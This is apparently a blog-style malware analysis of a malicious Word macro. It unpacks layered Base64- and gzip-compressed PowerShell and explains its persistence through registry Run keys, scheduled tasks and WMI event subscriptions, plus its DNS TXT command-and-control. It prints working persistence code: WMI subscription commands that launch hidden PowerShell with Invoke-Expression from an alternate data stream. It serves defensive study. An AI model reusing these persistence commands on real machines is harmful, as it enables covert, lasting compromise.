Malware Analysis

I'm trying to learn more about PowerShell so I can apply the knowledge towards feature engineering for a machine learning pipeline. I asked for interesting samples and my manager sent me a malicious Word document which had some PowerShell. The file hash of the malicious document is 340795d1f2c2bdab1f2382188a7b5c838e0a79d3f059d2db9eb274b0205f6981.

In this article, I'll go through the results of my analysis and talk about the methods I used and thought processes at each step.

Extracting the Source Code

I used oletools to extract the VBA macro source code from the document. After installing oletools, simply run the command olevba <filepath> to reveal the macro.

Layer 1 - VB and Embedded PowerShell

Right off the bat, there are several things the attacker does to make the script difficult to unravel. The author pads the script with a lot of blank lines, widely spreading apart its contents to make important code harder to spot. After revealing the macro with oletools, you'll probably have to do a lot of scrolling to read the whole script. Even worse, if the macro is revealed through a terminal with a limited scrollback buffer, part of the script will be cut off.

There is a function ParsingA() that appears to download content from the Internet, but it never seems to be used. It may be test code left over from the developer, code that's active in an older variant, or code the developer is working on that may be used in a newer variant.

You'll also notice that the author uses gratuitous string concatenation to break simple string signatures. This helps the attacker evade static analysis tools that look for strings like "winmgmts:\\.\root\cimv2" but are thrown off by something like

"w" & "" & "in" & "" & "mgm" & "" & "ts" & "" & ":" & "" & "\\" & "." & "\r" & "" & "oot\c" & "" & "imv" & "" & "2"

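One way to undo this trick before running string signatures is to fold adjacent literals back together. The following is a minimal sketch, not the method used in this analysis; the function name fold_vba_concat is made up for illustration, and it only handles literal-to-literal concatenation with &, not variables or function calls.

```python
import re

# One VBA string literal; a doubled quote ("") inside a literal is an escaped quote.
_LITERAL = r'"((?:[^"]|"")*)"'
# Two literals joined by the & operator.
_CONCAT = re.compile(_LITERAL + r'\s*&\s*' + _LITERAL)


def fold_vba_concat(source: str) -> str:
    """Repeatedly merge "a" & "b" into "ab" until nothing changes."""
    previous = None
    while previous != source:
        previous = source
        # A function replacement avoids backslash-escape handling in re.sub.
        source = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', source)
    return source


obfuscated = (
    r'"w" & "" & "in" & "" & "mgm" & "" & "ts" & "" & ":" & "" & "\\" '
    r'& "." & "\r" & "" & "oot\c" & "" & "imv" & "" & "2"'
)
print(fold_vba_concat(obfuscated))  # "winmgmts:\\.\root\cimv2"
```

After folding, a plain substring search for the WMI moniker matches again.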
There's also a large Base64 string contained in lStr wrapped around a PowerShell command that decodes the string.

lStr = "powershell -ep bypass -C ""$data = [System.Convert]::FromBase64String('H4sIAAAAAAAEAO1da3PayNL+7l+hol ... many many more lines ...
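To hand only the blob to a decoder, it first has to be separated from the surrounding command. Here is a minimal sketch, assuming the Base64 text sits inside a single contiguous FromBase64String('...') call in the saved macro source; the function name extract_base64_blobs is made up for illustration.

```python
import re

# Captures the quoted argument of FromBase64String('...').
# Whitespace is allowed inside the capture in case the blob was wrapped.
_B64_ARG = re.compile(r"FromBase64String\('([A-Za-z0-9+/=\s]+)'\)")


def extract_base64_blobs(text: str) -> list:
    """Return every Base64 argument found, with internal whitespace removed."""
    return ["".join(blob.split()) for blob in _B64_ARG.findall(text)]


sample = "$data = [System.Convert]::FromBase64String('SGVs\nbG8=')"
print(extract_base64_blobs(sample))  # ['SGVsbG8=']
```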

Let's decode it and dive further.

Unraveling the Base64

Below is a simple Python3 script I use to decode the Base64 blob mentioned earlier.

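import base64
import sys

# Read the Base64 text from the file given as the first argument.
with open(sys.argv[1]) as f:
    encoded = f.read()

# b64decode returns bytes, so write to the binary stdout buffer;
# sys.stdout.write() only accepts str in Python 3.
sys.stdout.buffer.write(base64.b64decode(encoded))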

After decoding, you'll notice that the resulting contents are still unreadable. We can tell through a few ways that the contents are in GZIP format. Most obviously, the VB string stored in lStr has a command to decompress the decoded contents using a System.IO.Compression.GZipStream object. Another way we can identify this as a gzip file is through its magic number, the beginning file signature (1F8B). We can also use the file <filepath> command on a Unix machine to recognize the data.
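The magic number check is easy to script. The sketch below is illustrative only; looks_like_gzip is a hypothetical helper name. It also shows why the blob in lStr begins with "H4sI": those four Base64 characters decode to the gzip signature followed by the compression method byte.

```python
import base64

# Every gzip stream starts with these two bytes.
GZIP_MAGIC = b"\x1f\x8b"


def looks_like_gzip(data: bytes) -> bool:
    """Return True when the data begins with the gzip file signature."""
    return data[:2] == GZIP_MAGIC


# The first four characters of the blob stored in lStr.
prefix = base64.b64decode("H4sI")
print(prefix.hex())             # 1f8b08
print(looks_like_gzip(prefix))  # True
```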

Now we'll decompress the contents using gunzip <filepath>. Note that gunzip expects the input file to have a .gz suffix and writes the decompressed output to a file with the same name minus that suffix. Opening it will reveal obfuscated PowerShell code (layer 2) with strange variable names. After cleaning up this mess and refactoring the code, there are some interesting things to note about how the malware achieves persistence. These are covered in the following section.

Layer 2 - Base64 Decoded and Decompressed PowerShell

Scrolling through the decompressed script, you'll find another Base64 blob which acts as the next stage's payload. This will be covered later in a section titled Layer 3.

Storing the Payload

If the victim has PowerShell 3.0 or later, the script stores the encoded layer 3 payload as an alternate data stream named kernel32.dll on %PROGRAMDATA%\Windows\ (the persistence code later reads it back with Get-Content -Stream). Otherwise, the script adds a new property called Path to a key in the registry to store the payload. If the user has administrator permissions, the payload will be stored in HKLM:Software\Microsoft\Windows\CurrentVersion. Otherwise, it will be stored in HKCU:Software\Microsoft\Windows.
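The branching described above can be summarized as a small decision function. This is only a sketch of the logic as described in this article, not code lifted from the malware; the function name and the returned description strings are made up for illustration.

```python
def payload_location(ps_major_version: int, is_admin: bool) -> str:
    """Describe where the layer 3 payload ends up, per the text above."""
    if ps_major_version >= 3:
        # PowerShell 3.0 or later: stored under the name kernel32.dll.
        return r"%PROGRAMDATA%\Windows\ (kernel32.dll)"
    # Older PowerShell: stored in a registry property named Path.
    key = (
        r"HKLM:Software\Microsoft\Windows\CurrentVersion"
        if is_admin
        else r"HKCU:Software\Microsoft\Windows"
    )
    return key + " (property: Path)"


print(payload_location(2, is_admin=False))
```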

Non-Admins: Registry Keys

The script creates a file called kernel32.vbs at %PROGRAMDATA%\Windows\ and writes code to it that retrieves and executes the payload from wherever it was stored in the previous step.

The attacker modifies Run registry keys to cause kernel32.vbs to run after waiting 30 minutes each time a user logs on. If the user has administrator permissions, the targeted key is HKLM:Software\Microsoft\Windows\CurrentVersion\Run\. Otherwise, the targeted key is HKCU:Software\Microsoft\Windows\CurrentVersion\Run\.

Admins: Creation of a New WMI Object

If the user has administrator permissions, the script creates a permanent WMI event subscription that watches for a user logon, waits 30 minutes, then executes the encoded payload. At this point, the program has exhibited enough strange behavior for the SentinelAgent to identify it as malware. Here's what it looks like.

First it removes the existing subscriptions.

gwmi __eventFilter -namespace root\subscription | Remove-WmiObject
gwmi CommandLineEventConsumer -Namespace root\subscription | Remove-WmiObject
gwmi __filtertoconsumerbinding -Namespace root\subscription | Remove-WmiObject

Then it creates its own. The logic goes something like this if you've got PowerShell 3.0 or later.

$event_filter = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace "root\subscription" -Class __EventFilter -Arguments @{Name = $kernel32_filter; EventNamespace = "root\CIMV2"; QueryLanguage = "WQL"; Query = "Select * from __InstanceCreationEvent within 30 where targetInstance isa 'Win32_LogonSession'"}

$event_consumer = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace "root\subscription" -Class CommandLineEventConsumer -Arguments @{Name = $kernel32_consumer; ExecutablePath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"; CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"IEX `$(Get-Content -Path $windows_path -Stream $kernel32_dll|Out-String)`""}

Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter = $event_filter; Consumer = $event_consumer}
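Since the goal of this exercise is feature engineering, the WMI class names above are natural candidates for binary features. The following is a rough sketch under that assumption; the feature names and the choice of patterns are mine and would need tuning against real benign scripts, many of which use WMI legitimately.

```python
import re

# Hypothetical feature names mapped to case-insensitive patterns
# taken from the snippets above.
PERSISTENCE_PATTERNS = {
    "wmi_event_filter": re.compile(r"__EventFilter", re.I),
    "wmi_cmdline_consumer": re.compile(r"CommandLineEventConsumer", re.I),
    "wmi_binding": re.compile(r"__FilterToConsumerBinding", re.I),
    "wmi_subscription_ns": re.compile(r"root\\subscription", re.I),
    "stream_parameter": re.compile(r"-Stream\b", re.I),
}


def persistence_features(script_text: str) -> dict:
    """Return a 0/1 flag per pattern for one PowerShell script."""
    return {
        name: int(bool(pattern.search(script_text)))
        for name, pattern in PERSISTENCE_PATTERNS.items()
    }


line = r"gwmi __eventFilter -namespace root\subscription | Remove-WmiObject"
print(persistence_features(line))
```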

Scheduled Task

The script also creates a scheduled task to run the malware 30 minutes after a user logs on. The method used to start the malware differs only slightly depending on whether the user has administrator permissions. If the user is a non-admin, wscript is used to execute the contents of kernel32.vbs. Otherwise, an Invoke-Expression cmdlet is used.

Layer 3 - DNS Lookups

Now that we've discussed the various ways the attacker achieves persistence of the malware, let's find out what this next encoded payload is responsible for.

After decoding and deobfuscating, you'll notice this bit of code at the start of the function's logic. A lot of other code follows this if-block.

[bool]$flag = $false;
$mutex = New-Object System.Threading.Mutex($true, "SourceFireSux", [ref] $flag);        
if (!$flag) { exit; }

At first glance it may seem as if the malicious code after this if-block should never execute, because $flag starts out as $false. That is exactly what a quick static read would suggest. However, the Mutex constructor receives $flag by reference and sets it to $true when the named mutex "SourceFireSux" (a cheeky jab at Sourcefire) did not already exist and was created by this call. On a first run the exit is therefore skipped and the malware continues executing. If the mutex already exists, $flag stays $false and the script exits, so the check also keeps a second copy of the malware from running at the same time.

It is apparent that the code repeatedly queries for DNS text records using the nslookup command. Responses from these queries dictate behavior of the program: whether it should sleep, continue, execute the response (using the Invoke-Expression cmdlet), or stop running. A result of "idle" would cause the process to sleep between 3500 and 5400 seconds before continuing. A result of "stop" would prompt the process to exit.
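The control flow driven by the TXT responses can be modeled in a few lines. This is a simplified sketch of the behavior described above, not a port of the malware: only the "idle" and "stop" keywords and the 3500 to 5400 second range come from the script, while the function name, the whitespace stripping, and treating every other response as something to execute are my assumptions. Nothing is actually executed here; the function only reports the decision.

```python
import random


def next_action(txt_response: str, rng: random.Random) -> tuple:
    """Map one DNS TXT response to an (action, detail) decision."""
    command = txt_response.strip()  # assumption: surrounding whitespace is ignored
    if command == "idle":
        # Sleep for a random duration before querying again.
        return ("sleep", rng.randint(3500, 5400))
    if command == "stop":
        return ("exit", None)
    # Assumption: anything else is treated as code for Invoke-Expression.
    return ("execute", txt_response)


rng = random.Random(0)
print(next_action("idle", rng)[0])  # sleep
print(next_action("stop", rng))     # ('exit', None)
```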

Since these domains are not active, we'll have to rely on previous analysis done on this script by Talos. We'll be talking about the payload retrieved by these DNS text queries in the following section.

Layer 4 - C2 Communication

Yet another payload is sent in response to the DNS TXT query. It includes a gzipped and Base64 encoded string along with a call to the dec function in layer 3 to unravel it. The result is passed to the Invoke-Expression cmdlet to be executed. According to Talos's analysis, this payload redirects STDIN, STDOUT, and STDERR so the attacker can read from and write to the command line processor. The payload performs more DNS lookups and establishes a communication channel with a command and control server. From here, the attacker can send commands to be executed on the victim machine's command line interpreter and receive the results of those commands, all through DNS TXT queries and responses.
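For analysts who capture such a response, the unwrapping step can be reproduced offline. The sketch below is a Python stand-in for what dec is described as doing (Base64 decode, then gunzip); the body of the real dec function is not reproduced in this article, and the UTF-8 text encoding is an assumption.

```python
import base64
import gzip


def dec(encoded: str, encoding: str = "utf-8") -> str:
    """Base64-decode, gunzip, and return the result as text."""
    compressed = base64.b64decode(encoded)
    return gzip.decompress(compressed).decode(encoding)


# Round trip with harmless sample text to show the expected input shape.
sample = base64.b64encode(gzip.compress(b"Write-Host 'hello'")).decode("ascii")
print(sample[:4])   # H4sI
print(dec(sample))  # Write-Host 'hello'
```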

Conclusion

Awesome! We just walked through an older but interesting piece of malware. I hope you learned a thing or two! Thanks for reading!
